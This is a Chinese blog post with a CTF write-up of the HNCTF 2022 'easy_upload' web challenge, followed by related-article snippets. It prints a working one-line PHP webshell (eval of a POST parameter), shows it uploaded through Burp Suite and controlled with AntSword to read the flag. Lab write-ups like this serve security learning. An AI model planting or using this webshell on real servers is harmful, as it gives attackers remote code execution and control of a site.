[HNCTF 2022 Week1]easy_upload

最新推荐文章于 2024-07-10 17:36:46 发布
最新推荐文章于 2024-07-10 17:36:46 发布
阅读量389 收藏 10
点赞数 7
分类专栏: 网络安全 web前端 CTF 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81393479/article/details/136121875
版权
网络安全 同时被 3 个专栏收录
12 篇文章 0 订阅
订阅专栏
web前端
8 篇文章 0 订阅
订阅专栏
CTF
6 篇文章 0 订阅
订阅专栏

进来看到题目叫我们上传文件,所以可知我们可以上传一句话木马文件 

一句话木马:webshell。在很多的渗透过程中,都会上传一句话木马到web服务目录来拿到获取系统权限。利用文件上传漏洞在目标网站中上传一句话木马,然后你就可以在本地通过蚁剑获取和控制整个网站目录。 php的一句话木马: <?php @eval($_POST['pass']);?>

@表示后面即使执行错误,也不会报错。eval()函数则表示括号内的语句字全都当做代码执行。$_POST['pass']; 的意思就是用post的方法接收pass这个变量。

  

 现在就用burpsuite抓包,然后上传木马。在filename里输入木马文件的文件名(命名随意)然后在下面上传一句话木马:<?php @eval($_POST['oo']);?>  所以这里就是用post接收oo这个变量。然后可以在右侧看到文件上传成功的路径:/upload/00.php

 

 

接下来打开蚁剑 。打开后鼠标右键点击添加数据(因为我之前做题时添加过url所以图中就显示)然后填入url:http://node5.anna.nssctf.cn:28629/upload/00.php,密码就是输入我们刚才用post接收的变量oo,然后点击添加。添加成功后就进入查看文件目录,然后找flag文件,点击查看flag:NSSCTF{12a37181-963f-4fd5-ba08-d47be0d21d7f}

 

 

hack3r_0pium
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
week2day2
02-18
1. HTML基本结构:HTML文档通常以`<!DOCTYPE html>`开头,声明文档类型。接着是`<html>`元素,它是整个文档的根元素。`<head>`包含元信息,如标题、字符集等,而`<body>`则包含网页的实际内容。 2. 标签和属性:...
week_1_part_1
03-30
"week_1_part_1"这个标题和描述可能代表一个学习计划或课程的第一周第一部分,主要聚焦于JavaScript的基础知识。让我们深入探讨一下JavaScript的核心概念以及在这个阶段可能会涉及到的内容。 JavaScript是一种解释...
【CTF】[HNCTF 2022 Week1]easy_upload
西原一点红的博客
06-19 302
webshell工具连接,flag在/下 文件名ffflllaaaggg或者GET请求 获取/目录读取flag文件。
2022HNCTF-web
bossDDYY的博客
10-30 3184
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 671
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1514
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解。
weekOfYear.rar_week of year_周数
09-24
LocalDate startDate = LocalDate.of(year, 1, 1).with(TemporalAdjusters.weeksInYear() * (week - 1)); LocalDate endDate = startDate.with(TemporalAdjusters.nextOrSame(java.time.DayOfWeek.SATURDAY)); ...
nasa_tv_schedule_for_web_week_of_11-7-2022_rev._d (1).pdf
11-21
nasa_tv_schedule_for_web_week_of_11-7-2022_rev._d (1).pdf
week_9_1_tools.py
10-25
week_9_1_tools.py
NSSCTF之Web篇刷题记录(13)
Aluxian_的博客
06-01 1132
【代码】NSSCTF之Web篇刷题记录(13)
文件上传漏洞
m0_70683009的博客
05-21 1167
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
2022hgame-week1 wp
Anton1a的博客
01-28 1742
记录一下hgame比赛。 WEB easy_auth 打开题目是一个登录框 题目描述里有admin,那就随便输个弱口令抓包看一下 看见返回包有这个,就想到这个题肯定考察js,为验证一下想法看一下源代码,里面存在login.js打开看一下发现确实是前端验证的 之后就注册一个账号登录看一下登录成功的返回包 登录成功返回的结果如下: {"code":2000,"message":"success","count":0,"data":[{"token":"eyJ...
[HNCTF]crypto-wps
weixin_52118017的博客
10-28 2238
hnctf-crypto方面题解
什么是CGI?
z_ruitao的博客
12-02 5291
CGI(Common Gateway Interface),即通用网关接口,是WWW技术中最重要的技术之一,是外部应用程序(即CGI程序)与WEB服务器之间的接口标准,负责在CGI程序和Web服务器之间传递信息。 CGI是Web服务器运行时,调用外部应用程序(即CGI程序,如nginx fast-cgi)的规范,CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将We...
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 693
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6650
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
最新发布
网 安 云
07-10 395
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
网络安全设备——蜜罐
Nove1205的博客
07-05 828
网络安全设备中的蜜罐是什么?
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值